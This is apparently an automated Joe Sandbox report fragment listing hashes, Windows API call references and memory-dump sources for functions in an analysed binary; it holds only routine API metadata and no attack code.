                  • Opcode ID: 2e4a481108ca5342f96717cb7be0457a8e4e98a482a911f4bcfdbc19292a9a84
                  • Instruction ID: 29058fb5ee1c659b5136fddab1566479729f9096739fb940e0136f9422b0381c
                  • Opcode Fuzzy Hash: 2e4a481108ca5342f96717cb7be0457a8e4e98a482a911f4bcfdbc19292a9a84
                  • Instruction Fuzzy Hash: D8F06532558658EFC710DF4CDC05B15FBACFB49B20F04436AF41993760CB746811DA91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,00F3A189,?,00F376B2,?,?,?,?), ref: 00F3A1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F3A189,?,00F376B2,?,?,?,?), ref: 00F3A1D1
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 003fbb64b536b5aab61debf22b3331b582793a40f82faffd3c53e50831153884
                  • Instruction ID: 5967e72d040fa3870b3c93b313fd41bc4f498d7357c0a9369371e0b225f23340
                  • Opcode Fuzzy Hash: 003fbb64b536b5aab61debf22b3331b582793a40f82faffd3c53e50831153884
                  • Instruction Fuzzy Hash: 73E09B3590011C67CB21AB64DC05BE57B5CAB083F1F0041A1FD54D3291D7709D44AEE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 74ec76f88a38d4b17f2333a8e46364bf2841ad4ecdcf5b7fea3b257c038bae99
                  • Instruction ID: dabaa986be2d0c161a5f223b259b4df6d5fe8655397649640fc841b822b9723c
                  • Opcode Fuzzy Hash: 74ec76f88a38d4b17f2333a8e46364bf2841ad4ecdcf5b7fea3b257c038bae99
                  • Instruction Fuzzy Hash: 8CE0127690511C7ADB219BA49C05FE67B6CFF09392F0400A5BA48D3105DAB49A449BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F49B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F49B37
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: a9eb53053ae36885c9b2f905221192bda7309f94326b83a5de1290e2f9538b47
                  • Instruction ID: e2e6c1cb8732f0d92305364bfcafd885e5a3c1ad544d4542de3739f742aad317
                  • Opcode Fuzzy Hash: a9eb53053ae36885c9b2f905221192bda7309f94326b83a5de1290e2f9538b47
                  • Instruction Fuzzy Hash: 90E0ED71905218EBCB20DF98D90179ABBE8EB05321F10809FEC9593201D6B56F14AB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F5329A: try_get_function.LIBVCRUNTIME ref: 00F532AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F52185
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: 20659d96cadbb1496808481e9a3e2eb6d50cb0ee9b856c0c4a47e4daa82eba3c
                  • Instruction ID: 3059747ecd95aee3c4c4b2094c16dbb1e0195e926be0f47c0ba0f0c15b91f517
                  • Opcode Fuzzy Hash: 20659d96cadbb1496808481e9a3e2eb6d50cb0ee9b856c0c4a47e4daa82eba3c
                  • Instruction Fuzzy Hash: ACD0A727504F06242CC426B42C4219B33445B53BB33E10745EF20C54D2EE16804C7012
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DloadLock.DELAYIMP ref: 00F4DC73
                  • DloadProtectSection.DELAYIMP ref: 00F4DC8F
                    • Part of subcall function 00F4DE67: DloadObtainSection.DELAYIMP ref: 00F4DE77
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: aa663311c414bcc3122774a0d34a347c08a622629c6ad924f453f6db217bc97e
                  • Instruction ID: 670103819fc0fddbeeddc503773d6fde347e4704e1b6749f97f469fcc45519ea
                  • Opcode Fuzzy Hash: aa663311c414bcc3122774a0d34a347c08a622629c6ad924f453f6db217bc97e
                  • Instruction Fuzzy Hash: 82D012709002055ED613EB149D8A71C3A74B70475CFA40643FA06E71A0DFF84C80F606
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: 58d4bfb3aad99ab2fbfc204ca57b59617198c0baf5027332ede596fde55cab4d
                  • Instruction ID: ec3b3eb17beba38a814c10568b2fbbd7b7ddd6540a8e6ed011f20eeb53783f06
                  • Opcode Fuzzy Hash: 58d4bfb3aad99ab2fbfc204ca57b59617198c0baf5027332ede596fde55cab4d
                  • Instruction Fuzzy Hash: 01C01232858208BECB410BB0DC09D2FBBA8BBA4212F05C90AB2A5C0060C238C0A0EB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 5aedaf9638b3308ce84781b7f2e0f201d9c399be5220c27aed7f307ba7527719
                  • Instruction ID: c2e075d76a97ea340130458442cc6ddaee9f9ce82f644b568e00095933e82de1
                  • Opcode Fuzzy Hash: 5aedaf9638b3308ce84781b7f2e0f201d9c399be5220c27aed7f307ba7527719
                  • Instruction Fuzzy Hash: 0CC19F30E042589FEF15DF68C894BA97BA5BF0A330F0840B9DC45DB386CB759944EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a13d088fed9bf014c8f7984b6708839340af63a540b5a0b9951ec80e2fbb9523
                  • Instruction ID: d52f90d63369d0e73b19ebfdcb25e2d63716807f89311bac08b5e3ebf22b5c66
                  • Opcode Fuzzy Hash: a13d088fed9bf014c8f7984b6708839340af63a540b5a0b9951ec80e2fbb9523
                  • Instruction Fuzzy Hash: 48710471504F48AEDB21DF30CC41AEBB7E8AF14321F44496EE5AB87242DB356A48EF11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F38384
                    • Part of subcall function 00F31380: __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F31380: new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F319A6: __EH_prolog.LIBCMT ref: 00F319AB
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 90cd33fea07da460a790a319d5feb73419299f3f9d8173e2f0da13cdf5bff576
                  • Instruction ID: 124ab8c5bcf13f12956c7bc00a4307674f1fb1eed174d0ae30bf4e3d62f3b850
                  • Opcode Fuzzy Hash: 90cd33fea07da460a790a319d5feb73419299f3f9d8173e2f0da13cdf5bff576
                  • Instruction Fuzzy Hash: 89419171C407549ADF20EB60CC55BEA77A8AF50360F0440EAF58AA3493DF7D5AC9EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31E05
                    • Part of subcall function 00F33B3D: __EH_prolog.LIBCMT ref: 00F33B42
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 2ce05786291ca3f85716fe9d5133a0fb5573cd41c450d195d61a497c05f98a66
                  • Instruction ID: d794947bb0086778bfc758fadbaacf8dbd0f780dab097175bff6dbbb6a35d111
                  • Opcode Fuzzy Hash: 2ce05786291ca3f85716fe9d5133a0fb5573cd41c450d195d61a497c05f98a66
                  • Instruction Fuzzy Hash: F82148329041089FCB11EF98DD519EEFBF6BF58310F1001ADE845A7251CB366E54EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4A7C8
                    • Part of subcall function 00F31380: __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F31380: new.LIBCMT ref: 00F313FE
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a5c1357aa131d71fc5f74de6a70c5450dd2d505a013210e2783ad8421735f8ee
                  • Instruction ID: bef9d7fd326b59b80ba0c03a2838cfc495b0c273619cf2df41d600ca0ad9b342
                  • Opcode Fuzzy Hash: a5c1357aa131d71fc5f74de6a70c5450dd2d505a013210e2783ad8421735f8ee
                  • Instruction Fuzzy Hash: B8213D75C042499ACF15DF94CD525EEBBB4FF19310F1004AEE809A7252DB396E06EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a2b9cb5be93685cbcf9bc48181df14bfe5e833960fae42ea55e1b55f807c449d
                  • Instruction ID: 41a0ba9da631216152ba32dab708e215c8182d7666610d6ecb702e49c71a2894
                  • Opcode Fuzzy Hash: a2b9cb5be93685cbcf9bc48181df14bfe5e833960fae42ea55e1b55f807c449d
                  • Instruction Fuzzy Hash: 9E117CB3E045289BCB22AAA8CC919DEB73ABF48770F044115F804B7251CBB98D10A7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction ID: 53bc1a11a0b400598e544cb61d70ae21ab8be636dec14ebfcd9aaffcacdabc27
                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction Fuzzy Hash: A6F08C32904705DFDF30DA66C945B16B7E8EB11330F20891AE8D6C2680E778D880E792
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F35BDC
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: c10df4e0348d9ba67b8329152f477928b279df4930770ed8014f6900093b94ea
                  • Instruction ID: 99163bbd4a03b649c3cf6de7d1c27fb6872e1dede90933eece5cad5603fffb7e
                  • Opcode Fuzzy Hash: c10df4e0348d9ba67b8329152f477928b279df4930770ed8014f6900093b94ea
                  • Instruction Fuzzy Hash: 01018170E15684DAC725F7B4C8553DDFBA4AF19B10F40419DE86A53383CBB81B08E7A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: fa5cf9b1479d98a2eb7a27963e4bd0ee23708464e2035c9db2e71d0e545fe570
                  • Instruction ID: bc40c6e1b5f0c03524843447a17128116a729a3f135e59d453d3590124513b46
                  • Opcode Fuzzy Hash: fa5cf9b1479d98a2eb7a27963e4bd0ee23708464e2035c9db2e71d0e545fe570
                  • Instruction Fuzzy Hash: E1E0E525A406655AEB313A695C00B9A378C9F417F3F1C0221EF14B2090EF20CC0F75E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00F3968F,?,?,?,?,00F61FA1,000000FF), ref: 00F396EB
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 4e26e55950e018982d66de432cd45e489e2c6063ab8700cd87165477866d7240
                  • Instruction ID: eff51d4f17502672ba10e5d8202cfe0a292c3d5eef8107ad99a086d36c4d836e
                  • Opcode Fuzzy Hash: 4e26e55950e018982d66de432cd45e489e2c6063ab8700cd87165477866d7240
                  • Instruction Fuzzy Hash: A3F0823095AB089FEB308A24D949792B7E49B12735F048B1ED0FB434E0D7E5688DAF00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F3A4F5
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: ad2da136d332713b5e47f68f8cb80cd5507498e0617d531f51fd253c76489e96
                  • Instruction ID: b5903af6a1d37dde3313ba8dc88d20dbd1e489758849c3b65c819c8a9ef71f62
                  • Opcode Fuzzy Hash: ad2da136d332713b5e47f68f8cb80cd5507498e0617d531f51fd253c76489e96
                  • Instruction Fuzzy Hash: 56F0E931409380AACA226B798C04BC6BB906F16331F04CA09F1FD02192C2B81485BB23
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00F406B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 3e1c7579bdb08e17e156a7309f9e034856df526a8a35dd7ed8b04ac902f9f068
                  • Instruction ID: 168282592df5530387f3e0480b4ad57afa28201bdfea823f7f8c4e0f48c062ea
                  • Opcode Fuzzy Hash: 3e1c7579bdb08e17e156a7309f9e034856df526a8a35dd7ed8b04ac902f9f068
                  • Instruction Fuzzy Hash: 65D0122560416075D6213B64AC057FE3E464FC3B30F094065F90E975878E5A08CA76A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00F49D81
                    • Part of subcall function 00F49B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F49B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: 6fbbb4fad2c57ed859fd22860f217f8f19bbe6db3b780dc65e06dfffd1c6c4ee
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: 35D09E71B582096ADF41BA659C02A6BBFA9EB40350F108165BC4886151E9B1DA10B661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileType.KERNELBASE(000000FF,00F39887), ref: 00F39995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: 97d999be2aa1ab1637c605d742c8ebeed0d48d7abd5fb363f90a99074d2b41a1
                  • Instruction ID: 5f7219ecc73fffc83c70db97b79da4bb745bc4eec12a30fad7e5414bf0d3fc14
                  • Opcode Fuzzy Hash: 97d999be2aa1ab1637c605d742c8ebeed0d48d7abd5fb363f90a99074d2b41a1
                  • Instruction Fuzzy Hash: 26D01231816141A58F6147344D092997751DB8337AF38C6E8D025C40A1D7F3C803F541
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00F4D43F
                    • Part of subcall function 00F4AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                    • Part of subcall function 00F4AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                    • Part of subcall function 00F4AC74: IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                    • Part of subcall function 00F4AC74: TranslateMessage.USER32(?), ref: 00F4ACB8
                    • Part of subcall function 00F4AC74: DispatchMessageW.USER32(?), ref: 00F4ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: ae34c43c1b296d35f42d2fe9d404b127fb760a9af83d433b9534cf0a6aeadf53
                  • Instruction ID: c9b4af284db05c00300b2142578932cbe2ece5ef5097195283b73db8d9b56cb2
                  • Opcode Fuzzy Hash: ae34c43c1b296d35f42d2fe9d404b127fb760a9af83d433b9534cf0a6aeadf53
                  • Instruction Fuzzy Hash: 70D09232184300BBDA126B51CE06F0F7AA6BB98B04F004A54B349740B28AA6AD71BB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 359bf072b76687e928cb3a738c77c4b85080ead42044b2a771873a22e8ef1af1
                  • Instruction ID: 257d693b6d879bf9bb38e69a2c57bb0c15b75714d8348e93c2dbd557ce12ac14
                  • Opcode Fuzzy Hash: 359bf072b76687e928cb3a738c77c4b85080ead42044b2a771873a22e8ef1af1
                  • Instruction Fuzzy Hash: DAB012A226C0017C314C61046D16E36261CC5C1B21330401AB80DD40C2D5409D8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6fa0ce8492107eeb70cc79aad5f47ddc47f61852fe0727b2e891977ad9e12236
                  • Instruction ID: d94c0d99f8fd03b8f0e15dc17ba324b02191e7626f682b1045af808f01668f68
                  • Opcode Fuzzy Hash: 6fa0ce8492107eeb70cc79aad5f47ddc47f61852fe0727b2e891977ad9e12236
                  • Instruction Fuzzy Hash: 2DB012A226D0017C314C61056C16E36261CC5C1B21330401AB80DD40D2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 512ce0465e87f1dc6a950ee66d70d02c25cdc8f4f469a9b36dd59c409761790a
                  • Instruction ID: 2144d78ad7f36a398ab4d9e6d9a0b1ec12dc308065b36f9204253fe9bfe554e2
                  • Opcode Fuzzy Hash: 512ce0465e87f1dc6a950ee66d70d02c25cdc8f4f469a9b36dd59c409761790a
                  • Instruction Fuzzy Hash: 45B012A226C1017C318861046C16E36261CC5C1B21330411BB80DD40C2D5409CC93432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5ef8c068f2eec7912942bab4b6d38cf8fa100c1fc7abbf1cd5763ab93404e54a
                  • Instruction ID: ef0d309de4cbf65151f8804fc887d7da87cc75a35c63323469b0a695fe5a4ad2
                  • Opcode Fuzzy Hash: 5ef8c068f2eec7912942bab4b6d38cf8fa100c1fc7abbf1cd5763ab93404e54a
                  • Instruction Fuzzy Hash: EFB012A226C0017C314861046C16E36261CC5C2B21330801ABC0DD40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0eebea2ed98a728fdea4c652e07237985e1856b82e305eab6235e597a421f3f9
                  • Instruction ID: e64f3dd18f13bbf6dfa569eefa1c22171d991c1913ee715ffa9c39a744deeb7a
                  • Opcode Fuzzy Hash: 0eebea2ed98a728fdea4c652e07237985e1856b82e305eab6235e597a421f3f9
                  • Instruction Fuzzy Hash: CAB0129226C1017C318861046C16E36261CC5C1B21330815BB809D41C2D5409CCE3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
